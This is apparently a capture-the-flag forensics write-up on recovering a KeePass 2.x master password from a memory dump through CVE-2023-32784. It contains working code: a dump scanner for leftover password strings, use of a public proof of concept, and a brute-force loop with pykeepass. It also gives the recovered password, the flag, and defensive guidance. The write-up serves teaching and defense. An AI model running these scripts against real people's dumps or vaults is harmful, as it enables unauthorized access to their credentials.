Unlocked
Recuite 2025 - HCMUS
October 6, 2025
Category: Forensics | Difficulty: Hard | Points: 400
Tags: KeePass, CVE-2023-32784, Memory Dump, Password Recovery

Unlocked - Writeup#

Challenge Information#

  • Category: Forensics
  • Files: Database.kdbx, KeePass.DMP (272MB)
  • Vulnerability: CVE-2023-32784

Overview#

Exploit CVE-2023-32784, a KeePass 2.x vulnerability (fixed in 2.54) that lets anyone holding a memory dump of the KeePass process recover the master password, minus its first character, from leftover strings.

Understanding CVE-2023-32784#

The Vulnerability#

KeePass 2.x uses a custom text box, SecureTextBoxEx, for password entry (the master password dialog and other places):

  • For every character typed, a leftover string is created in managed memory
  • .NET does not reliably clear or overwrite these strings once they exist
  • Typing "Password" leaves behind: ●a, ●●s, ●●●s, ●●●●w, ●●●●●o, ●●●●●●r, ●●●●●●●d
  • The first character is never preceded by a bullet, so it is lost; every other character is recoverable

Impact#

  • Works on process dumps, swap/pagefile, hibernation files, crash dumps and full RAM dumps
  • Works regardless of whether the workspace is locked
  • No code execution on the target is required, only read access to the memory artifact
  • Can still work after KeePass has been closed, with decreasing reliability as the memory gets reused

Exploitation#

Step 1: Extract Password Pattern#

```bash
git clone https://github.com/CMEPW/keepass-dump-masterkey.git
python3 keepass-dump-masterkey/poc.py KeePass.DMP
```

Output:

```text
Possible password: ●y_super_secret_&_super_duper_long_confidental_key_that_you_cannot_bruteforce
Possible password: ●'_super_secret_&_super_duper_long_confidental_key_that_you_cannot_bruteforce
...
Possible password: ●&_super_secret_&_super_duper_long_confidental_key_that_you_cannot_bruteforce
```

Analysis:

  • First character: unknown (●), never recoverable by this technique
  • Second character: 10 candidates (y, ', e, \, {, space, C, (, S, &), because several different "●x" leftover strings survived in the dump
  • Remaining: _super_secret_&_super_duper_long_confidental_key_that_you_cannot_bruteforce (unambiguous)
  • Note: the typo "confidental" (for "confidential") is part of the real password, so keep it as-is
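To make the leftover-string mechanism from "The Vulnerability" and the PoC output in Step 1 concrete, here is an added example (not code from the original writeup or from the CMEPW/vdohney PoCs) that scans a memory image for the same artifact the PoC relies on: runs of the masking bullet U+25CF, stored by .NET as the UTF-16LE byte pair CF 25, followed by a single printable character. Because a real KeePass.DMP cannot be shipped with the page, `build_fake_dump` constructs a stand-in with the strings that typing a password would leave behind, plus a decoy for position 2 to reproduce the multi-candidate situation seen above. The function names, the filler layout and the `[ay]` display syntax are this example's own choices, and the regex is a simplified version of the PoC's search rather than a copy of it.

```python
import random
import re
from collections import defaultdict

# SecureTextBoxEx masks input with U+25CF BLACK CIRCLE. .NET strings live in
# memory as UTF-16LE, so each bullet is the byte pair CF 25.
BULLET = "\u25cf"
BULLET_BYTES = BULLET.encode("utf-16-le")  # b"\xcf\x25"

# A leftover string: one or more bullets followed by exactly one printable
# ASCII code unit (the character that was typed last). Simplified heuristic,
# not the PoC's exact search.
LEFTOVER_RE = re.compile(rb"(?:\xcf\x25)+[\x20-\x7e]\x00")


def scan_dump(dump: bytes) -> dict[int, set[str]]:
    """Map each 1-based password position to the characters seen at it.

    n bullets followed by a character means that character was the (n+1)-th
    one typed. Position 1 is never preceded by a bullet, so it never appears.
    """
    found: dict[int, set[str]] = defaultdict(set)
    for m in LEFTOVER_RE.finditer(dump):
        chunk = m.group(0)
        n_bullets = (len(chunk) - 2) // 2
        found[n_bullets + 1].add(chunk[-2:].decode("utf-16-le"))
    return dict(found)


def reconstruct(found: dict[int, set[str]]) -> str:
    """Render the recovered pattern: ● for the unknown first character, the
    character itself where exactly one candidate was seen, [abc] where several
    were, and ? where no leftover string survived for that position."""
    if not found:
        return ""
    out = [BULLET]
    for pos in range(2, max(found) + 1):
        chars = sorted(found.get(pos, ()))
        if not chars:
            out.append("?")
        elif len(chars) == 1:
            out.append(chars[0])
        else:
            out.append("[" + "".join(chars) + "]")
    return "".join(out)


def build_fake_dump(typed: str, decoys=(), seed: int = 1337) -> bytes:
    """Constructed stand-in for KeePass.DMP (not a real dump): the leftover
    strings that typing `typed` would leave, plus optional decoys given as
    (position, char), scattered through deterministic filler. The filler never
    contains 0xCF, so it cannot produce a false bullet run."""
    rng = random.Random(seed)

    def filler() -> bytes:
        return bytes(rng.randrange(0x00, 0xCF) for _ in range(rng.randrange(64, 256)))

    leftovers = [BULLET * i + typed[i] for i in range(1, len(typed))]
    leftovers += [BULLET * (pos - 1) + ch for pos, ch in decoys]
    rng.shuffle(leftovers)
    parts = []
    for s in leftovers:
        parts.append(filler())
        parts.append(s.encode("utf-16-le"))
    parts.append(filler())
    return b"".join(parts)


if __name__ == "__main__":
    # "Password" typed once, plus a mistyped "y" at position 2 that was backspaced.
    dump = build_fake_dump("Password", decoys=[(2, "y")])
    print(reconstruct(scan_dump(dump)))  # ●[ay]ssword
```

Run against a real dump, `scan_dump(open("KeePass.DMP", "rb").read())` produces the same per-position candidate sets the PoC prints, which is exactly the input the brute force in Step 2 needs: one unknown first character and a short candidate list for any position where more than one leftover string survived.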

Step 2: Bruteforce First Two Characters#

```python
import itertools
import string

from pykeepass import PyKeePass
from pykeepass.exceptions import CredentialsError

suffix = "_super_secret_&_super_duper_long_confidental_key_that_you_cannot_bruteforce"
# Second-position candidates reported by the PoC; the first position is never recoverable
second_chars = ['y', "'", 'e', '\\', '{', ' ', 'C', '(', 'S', '&']
first_chars = string.printable.strip()  # 94 printable ASCII characters, whitespace trimmed

for first, second in itertools.product(first_chars, second_chars):
    password = first + second + suffix
    try:
        # Each attempt runs the database's key derivation, so this is slow but bounded
        kp = PyKeePass('Database.kdbx', password=password)
    except CredentialsError:
        continue  # wrong master password, try the next combination
    print(f"SUCCESS! Password: {password}")
    for entry in kp.entries:
        print(entry.title, entry.username, entry.password)
    break
```

Total: 94 × 10 = 940 attempts

Step 3: Database Unlocked!#

Password found after ~200 attempts:

my_super_secret_&_super_duper_long_confidental_key_that_you_cannot_bruteforce

Step 4: Extract Flag#

| Title | Username | Password |
|-------|----------|----------|
| Flag | blackpinker | BPCTF{r3memb3r_2_upgr4de_k33pa5s_7o_v3rsion_2.54} |

Flag#

BPCTF{r3memb3r_2_upgr4de_k33pa5s_7o_v3rsion_2.54}

Reminder: Upgrade to KeePass 2.54+ which fixes this vulnerability!

Key Takeaways#

Vulnerability Details#

  1. Affects KeePass 2.X before 2.54
  2. Caused by leftover strings that SecureTextBoxEx creates per keystroke and that .NET's managed memory does not clear
  3. Only first character lost, rest recoverable
  4. Works on various memory artifacts
  5. Locking workspace doesn't prevent attack

Defense#

  • Update KeePass to 2.54+ immediately
  • Change master password if used affected version
  • Clean memory artifacts:
    • Delete crash dumps
    • Delete hibernation file (hiberfil.sys)
    • Delete pagefile/swapfile
    • Overwrite deleted data
    • Restart computer

Affected vs Not Affected#

Affected: KeePass 2.X (< 2.54) written in .NET

Not Affected:

  • KeePass 2.54+
  • KeePass 1.X
  • KeePassXC
  • Other non-.NET implementations

Tools#

  1. Python PoC (CMEPW/keepass-dump-masterkey, used in Step 1)
  2. PyKeePass - database access and password verification
  3. Original C# PoC (vdohney/keepass-password-dumper)

Timeline#

  • May 2023: CVE discovered
  • June 2023: KeePass 2.54 released with fix
  • October 2025: This CTF challenge